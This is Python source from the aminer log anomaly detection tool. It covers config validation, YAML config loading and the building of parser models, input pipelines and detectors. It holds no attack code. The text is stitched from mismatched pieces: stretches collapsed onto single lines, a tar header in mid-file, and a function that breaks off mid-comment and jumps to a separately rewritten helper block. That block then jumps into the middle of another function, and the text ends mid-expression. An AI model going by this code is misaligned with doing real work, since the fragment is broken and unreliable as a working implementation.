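        if name in ("MatchPathFilter", "MatchValueFilter", "SubhandlerFilter"):
            module += ".AtomFilters"
        elif name in ("LinearNumericBinDefinition", "ModuloTimeBinDefinition", "PathDependentHistogramAnalysis", "BinDefinition",
                      "HistogramData"):
            module += ".HistogramAnalysis"
        elif name == "MissingMatchPathListValueDetector":
            module += ".MissingMatchPathValueDetector"
        elif name in ("AndMatchRule", "OrMatchRule", "AtomFilterMatchAction", "DebugHistoryMatchRule", "EventGenerationMatchAction",
                      "DebugMatchRule", "IPv4InRFC1918MatchRule", "ModuloTimeMatchRule", "NegationMatchRule", "ParallelMatchRule",
                      "PathExistsMatchRule", "StringRegexMatchRule", "ValueDependentDelegatedMatchRule",
                      "ValueDependentModuloTimeMatchRule", "ValueListMatchRule", "ValueMatchRule", "ValueRangeMatchRule"):
            module += ".Rules"
        elif name in ("TimeCorrelationDetector", "CorrelationFeature"):
            module += ".TimeCorrelationDetector"
        elif name in ("TimeCorrelationViolationDetector", "CorrelationRule", "EventClassSelector"):
            module += ".TimeCorrelationViolationDetector"
        elif name == "SimpleMonotonicTimestampAdjust":
            module += ".TimestampCorrectionFilters"
        elif name in ("SimpleUnparsedAtomHandler", "VerboseUnparsedAtomHandler"):
            module += ".UnparsedAtomHandlers"
        else:
            module += "." + name
        self.func = getattr(__import__(module, fromlist=[name]), name)

    def __str__(self):
        return self.name


class EventHandlerType:
    """Defines a type for event classes."""

    name = None
    func = None

    def __init__(self, name):
        self.name = name
        # Classes must be imported from the right modules. Some class names do not match the module name and need to be set explicitly.
        module = "aminer.events"
        if name in ("EventHandlerInterface", "EventSourceInterface"):
            module += ".EventInterfaces"
        elif name == "VolatileLogarithmicBackoffEventHistory":
            module += ".Utils"
        else:
            module += "." + name
        self.func = getattr(__import__(module, fromlist=[name]), name)

    def __str__(self):
        return self.name


parser_type = TypeDefinition("parsermodel", (ParserModelType, str), ())
analysis_type = TypeDefinition("analysistype", (AnalysisType, str), ())
event_handler_type = TypeDefinition("eventhandlertype", (EventHandlerType, str), ())


class ConfigValidator(Validator):
    """Validates values from the configs."""

    def _validate_has_start(self, has_start, field, value):
        """
        Test if there is a key named "has_start".

        Exactly one entry of the validated list may carry "start": True; with has_start set, at least one must.
        The line below is parsed by cerberus and must stay as is.
        The rule's arguments are validated against this schema:
        {'type': 'boolean'}
        """
        seen_start = False
        for var in value:
            if "start" in var and var["start"] is True:
                if seen_start:
                    self._error(field, 'Only one parser with "start"-key is allowed')
                seen_start = True
        if has_start and not seen_start:
            self._error(field, 'Parser must contain a "start"-key')

    def _validate_bigger_than_or_equal(self, bigger_than_or_equal, field, value):
        """
        Check if the value of the current attribute is bigger than or equal to the value of another attribute.

        This check works for integers and floats.
        Usage: {"bigger_than_or_equal": ["lower_value_attribute", default_value_if_not_defined]}
        For example: "max_num_vals": {"type": "integer", "bigger_than_or_equal": ["min_num_vals", 1000]}
        The line below is parsed by cerberus and must stay as is.
        The rule's arguments are validated against this schema:
        {'type': 'list'}
        """
        key, default_value = bigger_than_or_equal
        if key not in self.document:
            lower_value = default_value
        else:
            lower_value = self.document[key]
        if value < lower_value:
            # Report lower_value, not self.document[key]: the latter raised KeyError whenever the default was in use.
            self._error(field, f"{field}(={str(value)}) must be bigger than or equal with {key}(={str(lower_value)}).")


class NormalisationValidator(ConfigValidator):
    """Normalises values from the configs."""

    types_mapping = Validator.types_mapping.copy()
    types_mapping["parsermodel"] = parser_type
    types_mapping["analysistype"] = analysis_type
    types_mapping["eventhandlertype"] = event_handler_type

    # we skip the following issue, otherwise an
    # "must have self"-issue will pop up
    # skipcq: PYL-R0201
    def _normalize_coerce_toparsermodel(self, value):
        """Create a ParserModelType from the string representation."""
        if isinstance(value, str):
            return ParserModelType(value)
        return None

    # we skip the following issue, otherwise an
    # "must have self"-issue will pop up
    # skipcq: PYL-R0201
    def _normalize_coerce_toanalysistype(self, value):
        """Create a AnalysisType from the string representation."""
        if isinstance(value, str):
            return AnalysisType(value)
        return None

    # we skip the following issue, otherwise an
    # "must have self"-issue will pop up
    # skipcq: PYL-R0201
    def _normalize_coerce_toeventhandlertype(self, value):
        """Create a EventHandlerType from the string representation."""
        if isinstance(value, str):
            return EventHandlerType(value)
        return None
logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/YamlConfig.py000066400000000000000000002102231437606560100316110ustar00rootroot00000000000000
"""
This file loads and parses a config-file in yaml format.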
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import sys import logging import copy import ast from aminer.AminerConfig import DEBUG_LOG_NAME config_properties = {} yaml_data = None enhanced_new_match_path_value_combo_detector_reference = None def load_yaml(config_file): """ Load the yaml configuration from files. Basically there are two schema types: validation schemas and normalisation schemas. The validation schemas validate together with the BaseSchema all inputs as specifically as possible. Due to the limitations of oneof_schemas and the not functional normalisation in the validation schemas, the normalisation schemas are used to set default values and convert the date in right data types with coerce procedures. 
""" # We might be able to remove this and us it like the config_properties # skipcq: PYL-W0603 global yaml_data import yaml from aminer.ConfigValidator import ConfigValidator, NormalisationValidator import os with open(config_file) as yamlfile: # skipcq: PTC-W6004 try: yaml_data = yaml.safe_load(yamlfile) yamlfile.close() except yaml.YAMLError as exception: logging.getLogger(DEBUG_LOG_NAME).error(exception) raise exception with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/BaseSchema.py', 'r') as sma: # skipcq: PYL-W0123 base_schema = eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/normalisation/ParserNormalisationSchema.py', 'r') as sma: # skipcq: PYL-W0123 parser_normalisation_schema = eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/normalisation/AnalysisNormalisationSchema.py', 'r') as sma: # skipcq: PYL-W0123 analysis_normalisation_schema = eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/normalisation/EventHandlerNormalisationSchema.py', 'r') as sma: # skipcq: PYL-W0123 event_handler_normalisation_schema = eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/validation/ParserValidationSchema.py', 'r') as sma: # skipcq: PYL-W0123 parser_validation_schema = eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/validation/AnalysisValidationSchema.py', 'r') as sma: # skipcq: PYL-W0123 analysis_validation_schema = eval(sma.read()) with open(os.path.dirname(os.path.abspath(__file__)) + '/' + 'schemas/validation/EventHandlerValidationSchema.py', 'r') as sma: # skipcq: PYL-W0123 event_handler_validation_schema = eval(sma.read()) normalisation_schema = { **base_schema, **parser_normalisation_schema, **analysis_normalisation_schema, **event_handler_normalisation_schema} validation_schema = {**base_schema, **parser_validation_schema, **analysis_validation_schema, 
**event_handler_validation_schema} v = ConfigValidator(validation_schema) if not v.validate(yaml_data, validation_schema): filtered_errors = copy.deepcopy(v.errors) filter_config_errors(filtered_errors, 'Analysis', v.errors, analysis_validation_schema) filter_config_errors(filtered_errors, 'Parser', v.errors, parser_validation_schema) filter_config_errors(filtered_errors, 'EventHandlers', v.errors, event_handler_validation_schema) raise ValueError(f'Config-Error: {filtered_errors}') v = NormalisationValidator(normalisation_schema) if v.validate(yaml_data, normalisation_schema): test = v.normalized(yaml_data) yaml_data = test else: logging.getLogger(DEBUG_LOG_NAME).error(v.errors) raise ValueError(v.errors) # Set default values for key, val in yaml_data.items(): config_properties[str(key)] = val def filter_config_errors(filtered_errors, key_name, errors, schema): """Filter oneof outputs to produce a clear overview of the error.""" oneof = schema[key_name]['schema']['oneof'] if key_name in errors: for i, err in enumerate(errors[key_name]): if isinstance(err, str): err = {0: err} for key in err: if 'none or more than one rule validate' in err[key]: for cause in err[key]: if isinstance(cause, dict): # we need to copy the dictionary as it is not possible to iterate through it and change the size. 
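# Add your ruleset here:
def build_analysis_pipeline(analysis_context):
    """
    Create the complete aminer pipeline from the loaded YAML configuration.

    Builds the parsing model, the input pipeline (atomizer factory plus atom filter), the analysis components and the
    event handlers, then replaces every analysis component's ``output_event_handlers`` id list with the handler objects
    those ids name.

    :param analysis_context: the AnalysisContext the components get registered with.
    :raises ValueError: if an analysis component references an event handler id that build_event_handlers did not create.
    """
    parsing_model = build_parsing_model()
    anomaly_event_handlers, atom_filter = build_input_pipeline(analysis_context, parsing_model)
    build_analysis_components(analysis_context, anomaly_event_handlers, atom_filter, parsing_model)
    event_handler_id_list = build_event_handlers(analysis_context, anomaly_event_handlers)
    # Slot 0 of the subhandler list is reserved for the UnparsedAtomHandler; it gets no output handler wiring here.
    for index, analysis_component in enumerate(atom_filter.subhandler_list[1:], start=1):
        handler_ids = analysis_component[0].output_event_handlers
        if handler_ids is None:
            continue
        event_handlers = []
        for handler_id in handler_ids:
            # A bare .index() would fail with a ValueError that does not name the offending id; report a config error instead.
            if handler_id not in event_handler_id_list:
                raise ValueError(f'Config-Error: The event handler "{handler_id}" used in output_event_handlers does not exist!')
            # event_handler_id_list and anomaly_event_handlers are presumably parallel lists; verify against build_event_handlers.
            event_handlers.append(anomaly_event_handlers[event_handler_id_list.index(handler_id)])
        atom_filter.subhandler_list[index][0].output_event_handlers = event_handlers


# Model elements whose arguments are passed to the constructor verbatim instead of being converted to bytes.
_VERBATIM_ARG_MODELS = ('DecimalFloatValueModelElement', 'DecimalIntegerValueModelElement')


def _decode_escapes(text):
    """
    Convert a configuration string to the bytes a parser model expects, turning spelled-out escape sequences into bytes.

    ``\\n``, ``\\t``, ``\\r`` and ``\\b`` become newline, tab, carriage return and backspace and a doubled backslash is
    collapsed to one. The replacements run in the same order as the inline chain this replaces, so existing
    configurations keep their meaning.

    :param text: a str value taken from the YAML configuration.
    :return: the encoded bytes.
    """
    return text.encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace(b"\\r", b"\r").replace(b"\\\\", b"\\").replace(b"\\b", b"\b")


def _lookup_parser_model(parser_model_dict, model_id):
    """
    Return the already built parser model stored under model_id.

    :raises ValueError: (after logging) when no model with that id was built before the referencing entry.
    """
    model = parser_model_dict.get(model_id)
    if model is None:
        msg = f'The parser model {model_id} does not exist!'
        logging.getLogger(DEBUG_LOG_NAME).error(msg)
        raise ValueError(msg)
    return model


def _prepare_model_args(item, ws_count):
    """
    Normalise the ``args`` of a parser model entry in place and return the updated whitespace counter.

    In a list, every ``WHITESPACE`` marker (str or bytes) is replaced by a FixedDataModelElement matching one space,
    named ``sp<n>`` with a counter shared across the whole Parser section. Afterwards every str argument (a single str
    value as well) is converted with _decode_escapes, unless the model takes its arguments verbatim.

    :param item: the Parser entry; its ``args`` value is modified in place.
    :param ws_count: number of whitespace elements created so far.
    :return: the whitespace counter after this entry.
    """
    args = item['args']
    encode_args = item['type'].name not in _VERBATIM_ARG_MODELS
    if isinstance(args, list):
        for i, value in enumerate(args):
            if (isinstance(value, str) and value == "WHITESPACE") or (isinstance(value, bytes) and value == b"WHITESPACE"):
                from aminer.parsing.FixedDataModelElement import FixedDataModelElement
                args[i] = FixedDataModelElement(f'sp{ws_count}', b' ')
                ws_count += 1
        if encode_args:
            for j, val in enumerate(args):
                if isinstance(val, str):
                    args[j] = _decode_escapes(val)
    elif encode_args and isinstance(args, str):
        item['args'] = _decode_escapes(args)
    return ws_count


def build_parsing_model(data=None):
    """
    Build the parser model tree from the ``Parser`` section of the configuration.

    Entries are instantiated in list order and stored under their ``id``, so an entry may only reference entries that
    precede it (sequence children, branch models, the optional or repeated element). Each entry must carry an already
    resolved ``type`` object exposing ``name``, ``is_model`` and ``func``; resolving the type from the YAML is not done
    here. Entries whose type is not a model element are built by calling ``func`` (and any callable it returns) until a
    non-callable model remains. The entries of the configuration are modified in place.

    :param data: the loaded configuration dict; defaults to the module-level ``yaml_data``.
    :return: the parser model of the entry marked ``start: true``. If several entries set it, the last one wins.
    :raises ValueError: on duplicate ids, references to unknown models, a malformed date format, more than three
        RepeatedElementDataModelElement arguments, or when no entry is marked as start.
    :raises TypeError: when the ``args`` of a FirstMatchModelElement or SequenceModelElement is not a list.
    """
    parser_model_dict = {}
    start = None
    ws_count = 0
    if data is None:
        data = yaml_data
    for item in data['Parser']:
        item_type = item['type']
        name = item_type.name
        if item['id'] in parser_model_dict:
            raise ValueError(f'Config-Error: The id "{item["id"]}" occurred multiple times in Parser!')
        # JSON start elements are instantiated directly below and are never stored in parser_model_dict.
        if item.get('start') is True and name not in ('JsonModelElement', 'JsonStringModelElement'):
            start = item
        if not item_type.is_model:
            if callable(item_type):
                parser_model_dict[item['id']] = item_type.func()
            else:
                parser_model_dict[item['id']] = item_type.func
            while callable(parser_model_dict[item['id']]):
                parser_model_dict[item['id']] = parser_model_dict[item['id']]()
            continue
        if 'args' in item:
            ws_count = _prepare_model_args(item, ws_count)
        if name == 'ElementValueBranchModelElement':
            value_model = _lookup_parser_model(parser_model_dict, item['args'][0].decode())
            branch_model_dict = {}
            for branch in item['branch_model_dict']:
                # The error names the missing model id, not the branch key as before.
                branch_model_dict[branch['id']] = _lookup_parser_model(parser_model_dict, branch['model'])
            parser_model_dict[item['id']] = item_type.func(item['name'], value_model, item['args'][1].decode(), branch_model_dict)
        elif name == 'DateTimeModelElement':
            parser_model_dict[item['id']] = item_type.func(
                item['name'], item['date_format'].encode(), None, item['text_locale'], item['start_year'], item['max_time_jump_seconds'])
        elif name == 'MultiLocaleDateTimeModelElement':
            date_formats = []
            for date_format in item['date_formats']:
                fmt = date_format['format']
                if len(fmt) != 3:
                    msg = 'The date_format must have a size of 3!'
                    logging.getLogger(DEBUG_LOG_NAME).error(msg)
                    raise ValueError(msg)
                fmt[0] = _decode_escapes(fmt[0])
                date_formats.append(tuple(fmt))
            parser_model_dict[item['id']] = item_type.func(item['name'], date_formats, item['start_year'], item['max_time_jump_seconds'])
        elif name == 'RepeatedElementDataModelElement':
            # Reject the argument count before anything is built; the first argument is the id of the repeated model.
            if len(item['args']) > 3:
                msg = 'The RepeatedElementDataModelElement does not have more than 3 arguments.'
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise ValueError(msg)
            item['args'][0] = _lookup_parser_model(parser_model_dict, item['args'][0].decode())
            parser_model_dict[item['id']] = item_type.func(item['name'], *item['args'])
        elif name == 'DecimalFloatValueModelElement':
            parser_model_dict[item['id']] = item_type.func(
                item['name'], item['value_sign_type'], item['value_pad_type'], item['exponent_type'])
        elif name == 'DecimalIntegerValueModelElement':
            parser_model_dict[item['id']] = item_type.func(item['name'], item['value_sign_type'], item['value_pad_type'])
        elif name in ('FirstMatchModelElement', 'SequenceModelElement'):
            if not isinstance(item['args'], list):
                msg = f'"args" has to be a list when using the {item["type"].name}. Currently args is defined as {repr(item["args"])}'
                logging.getLogger(DEBUG_LOG_NAME).error(msg)
                raise TypeError(msg)
            children = []
            for child in item['args']:
                if isinstance(child, bytes):
                    child = child.decode()
                if isinstance(child, str):
                    children.append(_lookup_parser_model(parser_model_dict, child))
                else:
                    # Already a model element, e.g. the substitute created for a WHITESPACE marker.
                    children.append(child)
            parser_model_dict[item['id']] = item_type.func(item['name'], children)
        elif name == 'OptionalMatchModelElement':
            optional_element = _lookup_parser_model(parser_model_dict, item['args'].decode())
            parser_model_dict[item['id']] = item_type.func(item['name'], optional_element)
        elif name == 'DelimitedDataModelElement':
            delimiter = _decode_escapes(item['delimiter'])
            parser_model_dict[item['id']] = item_type.func(item['name'], delimiter, item['escape'], item['consume_delimiter'])
        elif name == 'JsonModelElement':
            key_parser_dict = parse_json_yaml(item['key_parser_dict'], parser_model_dict)
            model = item_type.func(
                item['name'], key_parser_dict, item['optional_key_prefix'], item['nullable_key_prefix'], item['allow_all_fields'])
            if item.get('start') is True:
                start = model
            else:
                parser_model_dict[item['id']] = model
        elif name == 'JsonStringModelElement':
            key_parser_dict = parse_json_yaml(item['key_parser_dict'], parser_model_dict)
            model = item_type.func(item['name'], key_parser_dict, item['strict'], item['ignore_null'])
            if item.get('start') is True:
                start = model
            else:
                parser_model_dict[item['id']] = model
        elif 'args' in item:
            parser_model_dict[item['id']] = item_type.func(item['name'], item['args'])
        else:
            parser_model_dict[item['id']] = item_type.func(item['name'])
    if start is None:
        # Previously this fell through to a subscript on None and died with an unhelpful TypeError.
        raise ValueError('Config-Error: No parser model in Parser is marked with "start: true"!')
    if start.__class__.__name__ in ('JsonModelElement', 'JsonStringModelElement'):
        return start
    return parser_model_dict[start['id']]


def build_input_pipeline(analysis_context, parsing_model):
    """
    Build the input pipeline: the atom filter that fans atoms out to the analysis handlers and the atomizer factory.

    Reads the ``Input`` section of the configuration: ``timestamp_paths`` (a single str is wrapped in a list),
    ``sync_wait_time``, ``eol_sep`` (escape sequences decoded), ``json_format``, ``multi_source`` and
    ``adjust_timestamps``. Depending on the last two, the atom filter is wrapped in a SimpleMultisourceAtomSync and/or a
    SimpleMonotonicTimestampAdjust before being handed to the atomizer factory.

    :param analysis_context: the AnalysisContext; the atom filter is registered on it and its atomizer_factory is set.
    :param parsing_model: the root parser model returned by build_parsing_model.
    :return: a tuple (anomaly_event_handlers, atom_filter); the handler list is still empty and filled in later.
    """
    # Some generic imports.
    from aminer.analysis import AtomFilters
    # Create all global handler lists here and append the real handlers later on.
    # Use this filter to distribute all atoms to the analysis handlers.
    atom_filter = AtomFilters.SubhandlerFilter(None)
    analysis_context.register_component(atom_filter, component_name="AtomFilter")
    anomaly_event_handlers = []
    # Now define the AtomizerFactory using the model. A simple line based one is usually sufficient.
    from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory
    input_config = yaml_data['Input']
    timestamp_paths = input_config['timestamp_paths']
    if isinstance(timestamp_paths, str):
        timestamp_paths = [timestamp_paths]
    sync_wait_time = input_config['sync_wait_time']
    eol_sep = _decode_escapes(input_config['eol_sep'])
    json_format = input_config['json_format']
    adjust_timestamps = input_config['adjust_timestamps'] is True
    if adjust_timestamps:
        from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust
        inner_handlers = [SimpleMonotonicTimestampAdjust([atom_filter])]
    else:
        inner_handlers = [atom_filter]
    if input_config['multi_source'] is True:
        from aminer.input.SimpleMultisourceAtomSync import SimpleMultisourceAtomSync
        atom_handler_list = [SimpleMultisourceAtomSync(inner_handlers, sync_wait_time=sync_wait_time)]
    else:
        atom_handler_list = inner_handlers
    analysis_context.atomizer_factory = SimpleByteStreamLineAtomizerFactory(
        parsing_model, atom_handler_list, anomaly_event_handlers, default_timestamp_path_list=timestamp_paths, eol_sep=eol_sep,
        json_format=json_format)
    return anomaly_event_handlers, atom_filter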
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) learn = yaml_data['LearnMode'] func = item['type'].func if item['suppress']: if comp_name is None: raise ValueError(f'Config-Error: id must be specified for the analysis component {item["type"]} to enable suppression.') suppress_detector_list.append(comp_name) if item['type'].name == 'NewMatchPathValueDetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, learn_mode=learn, persistence_id=item['persistence_id'], output_logline=item['output_logline']) elif item['type'].name == 'MatchPathFilter': parsed_atom_handler_lookup_list = [] for atom_handler in item['parsed_atom_handler_lookup_list']: if atom_handler[1] is not None: if analysis_context.get_component_by_name(atom_handler[1]) is None: msg = f'The atom handler {atom_handler[1]} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) atom_handler[1] = analysis_context.get_component_by_name(atom_handler[1]) parsed_atom_handler_lookup_list.append(tuple(i for i in atom_handler)) default_parsed_atom_handler = item['default_parsed_atom_handler'] if default_parsed_atom_handler is not None: if analysis_context.get_component_by_name(default_parsed_atom_handler) is None: msg = f'The atom handler {default_parsed_atom_handler} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) default_parsed_atom_handler = analysis_context.get_component_by_name(default_parsed_atom_handler) tmp_analyser = func(parsed_atom_handler_lookup_list, default_parsed_atom_handler=default_parsed_atom_handler) elif item['type'].name == 'MatchValueFilter': parsed_atom_handler_dict = {} for atom_handler in item['parsed_atom_handler_dict']: if analysis_context.get_component_by_name(atom_handler) is None: msg = f'The atom handler {atom_handler} does not exist!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) parsed_atom_handler_dict[atom_handler] = analysis_context.get_component_by_name(atom_handler) default_parsed_atom_handler = item['default_parsed_atom_handler'] if default_parsed_atom_handler is not None: if analysis_context.get_component_by_name(default_parsed_atom_handler) is None: msg = f'The atom handler {default_parsed_atom_handler} does not exist!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) default_parsed_atom_handler = analysis_context.get_component_by_name(default_parsed_atom_handler) tmp_analyser = func(item['path'], parsed_atom_handler_dict, default_parsed_atom_handler=default_parsed_atom_handler) elif item['type'].name == 'PCADetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, persistence_id=item['persistence_id'], window_size=item['window_size'], min_anomaly_score=item['min_anomaly_score'], min_variance=item['min_variance'], num_windows=item['num_windows'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list']) elif item['type'].name == 'NewMatchPathValueComboDetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, learn_mode=learn, persistence_id=item['persistence_id'], allow_missing_values_flag=item['allow_missing_values'], output_logline=item['output_logline']) elif item['type'].name == 'MissingMatchPathValueDetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, learn_mode=learn, persistence_id=item['persistence_id'], default_interval=item['check_interval'], realert_interval=item['realert_interval'], combine_values=item['combine_values'], output_logline=item['output_logline']) elif item['type'].name == 'MissingMatchPathListValueDetector': tmp_analyser = func(analysis_context.aminer_config, item['path'], anomaly_event_handlers, learn_mode=learn, 
persistence_id=item['persistence_id'], default_interval=item['check_interval'], realert_interval=item['realert_interval'], combine_values=item['combine_values'], output_logline=item['output_logline']) elif item['type'].name == 'EventSequenceDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['id_path_list'], target_path_list=item['paths'], persistence_id=item['persistence_id'], seq_len=item['seq_len'], learn_mode=learn, timeout=item['timeout'], allow_missing_id=item['allow_missing_id'], output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list']) elif item['type'].name == 'ValueRangeDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['id_path_list'], target_path_list=item['paths'], persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list']) elif item['type'].name == 'CharsetDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['id_path_list'], target_path_list=item['paths'], persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list']) elif item['type'].name == 'EntropyDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], prob_thresh=item['prob_thresh'], default_freqs=item['default_freqs'], skip_repetitions=item['skip_repetitions'], persistence_id=item['persistence_id'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list']) elif item['type'].name == 'EventFrequencyDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], scoring_path_list=item['scoring_path_list'], 
unique_path_list=item['unique_path_list'], persistence_id=item['persistence_id'], window_size=item['window_size'], num_windows=item['num_windows'], confidence_factor=item['confidence_factor'], empty_window_warnings=item['empty_window_warnings'], early_exceeding_anomaly_output=item['early_exceeding_anomaly_output'], set_lower_limit=item['set_lower_limit'], set_upper_limit=item['set_upper_limit'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list']) elif item['type'].name == 'EventCountClusterDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], persistence_id=item['persistence_id'], id_path_list=item['id_path_list'], window_size=item['window_size'], num_windows=item['num_windows'], confidence_factor=item['confidence_factor'], idf=item['idf'], norm=item['norm'], add_normal=item['add_normal'], check_empty_windows=item['check_empty_windows'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list']) elif item['type'].name == 'TimeCorrelationDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['parallel_check_count'], persistence_id=item['persistence_id'], record_count_before_event=item['record_count_before_event'], output_logline=item['output_logline'], use_path_match=item['use_path_match'], use_value_match=item['use_value_match'], min_rule_attributes=item['min_rule_attributes'], max_rule_attributes=item['max_rule_attributes']) elif item['type'].name == 'ParserCount': tmp_analyser = func( analysis_context.aminer_config, item['paths'], anomaly_event_handlers, report_interval=item['report_interval'], target_label_list=item['labels'], split_reports_flag=item['split_reports_flag']) elif item['type'].name == 'EventCorrelationDetector': tmp_analyser = func( analysis_context.aminer_config, anomaly_event_handlers, 
target_path_list=item['paths'], max_hypotheses=item['max_hypotheses'], hypothesis_max_delta_time=item['hypothesis_max_delta_time'], generation_probability=item['generation_probability'], generation_factor=item['generation_factor'], max_observations=item['max_observations'], p0=item['p0'], alpha=item['alpha'], candidates_size=item['candidates_size'], hypotheses_eval_delta_time=item['hypotheses_eval_delta_time'], constraint_list=item['constraint_list'], delta_time_to_discard_hypothesis=item['delta_time_to_discard_hypothesis'], check_rules_flag=item['check_rules_flag'], learn_mode=learn, ignore_list=item['ignore_list'], persistence_id=item['persistence_id']) elif item['type'].name == 'NewMatchIdValueComboDetector': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, id_path_list=item['id_path_list'], min_allowed_time_diff=item['min_allowed_time_diff'], learn_mode=learn, persistence_id=item['persistence_id'], allow_missing_values_flag=item['allow_missing_values'], output_logline=item['output_logline']) elif item['type'].name == 'SlidingEventFrequencyDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, target_path_list=item['paths'], scoring_path_list=item['scoring_path_list'], persistence_id=item['persistence_id'], window_size=item['window_size'], set_upper_limit=item['set_upper_limit'], local_maximum_threshold=item['local_maximum_threshold'], learn_mode=learn, output_logline=item['output_logline'], ignore_list=item['ignore_list'], constraint_list=item['constraint_list']) elif item['type'].name == 'LinearNumericBinDefinition': if comp_name is None: msg = f'The {item["type"].name} must have an id!' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) analysis_dict[comp_name] = func(item['lower_limit'], item['bin_size'], item['bin_count'], item['outlier_bins_flag']) continue elif item['type'].name == 'ModuloTimeBinDefinition': if comp_name is None: msg = f'The {item["type"].name} must have an id!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) analysis_dict[comp_name] = func(item['modulo_value'], item['time_unit'], item['lower_limit'], item['bin_size'], item['bin_count'], item['outlier_bins_flag']) continue elif item['type'].name == 'HistogramAnalysis': histogram_definitions = [] for histogram_definition in item['histogram_defs']: if len(histogram_definition) != 2: msg = 'Every item of the histogram_definitions must have an size of 2!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if histogram_definition[1] not in analysis_dict: msg = f'{histogram_definition[1]} first must be defined before used.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) histogram_definitions.append([histogram_definition[0], analysis_dict[histogram_definition[1]]]) tmp_analyser = func(analysis_context.aminer_config, histogram_definitions, item['report_interval'], anomaly_event_handlers, reset_after_report_flag=item['reset_after_report_flag'], persistence_id=item['persistence_id'], output_logline=item['output_logline']) elif item['type'].name == 'PathDependentHistogramAnalysis': if item['bin_definition'] not in analysis_dict: msg = f'{item["bin_definition"]} first must be defined before used.' 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) tmp_analyser = func( analysis_context.aminer_config, item['path'], analysis_dict[item['bin_definition']], item['report_interval'], anomaly_event_handlers, reset_after_report_flag=item['reset_after_report_flag'], persistence_id=item['persistence_id'], output_logline=item['output_logline']) elif item['type'].name == 'EnhancedNewMatchPathValueComboDetector': tuple_transformation_function = None if item['tuple_transformation_function'] == 'demo': tuple_transformation_function = tuple_transformation_function_demo_print_every_10th_value tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, persistence_id=item['persistence_id'], allow_missing_values_flag=item['allow_missing_values'], learn_mode=learn, tuple_transformation_function=tuple_transformation_function, output_logline=item['output_logline']) # skipcq: PYL-W0603 global enhanced_new_match_path_value_combo_detector_reference enhanced_new_match_path_value_combo_detector_reference = tmp_analyser elif item['type'].name == 'MatchFilter': tmp_analyser = func(analysis_context.aminer_config, item['paths'], anomaly_event_handlers, target_value_list=item['value_list'], output_logline=item['output_logline']) elif item['type'].name == 'MatchValueAverageChangeDetector': tmp_analyser = func(analysis_context.aminer_config, anomaly_event_handlers, item['timestamp_path'], item['paths'], item['min_bin_elements'], item['min_bin_time'], debug_mode=item['debug_mode'], persistence_id=item['persistence_id'], output_logline=item['output_logline']) elif item['type'].name == 'MatchValueStreamWriter': stream = sys.stdout if item['stream'] == 'sys.stderr': stream = sys.stderr tmp_analyser = func(stream, item['paths'], item['separator'].encode().replace(b"\\n", b"\n").replace(b"\\t", b"\t").replace( b"\\r", b"\r").replace(b"\\\\", b"\\").replace(b"\\b", b"\b"), item['missing_value_string'].encode().replace( b"\\n", b"\n").replace(b"\\t", 
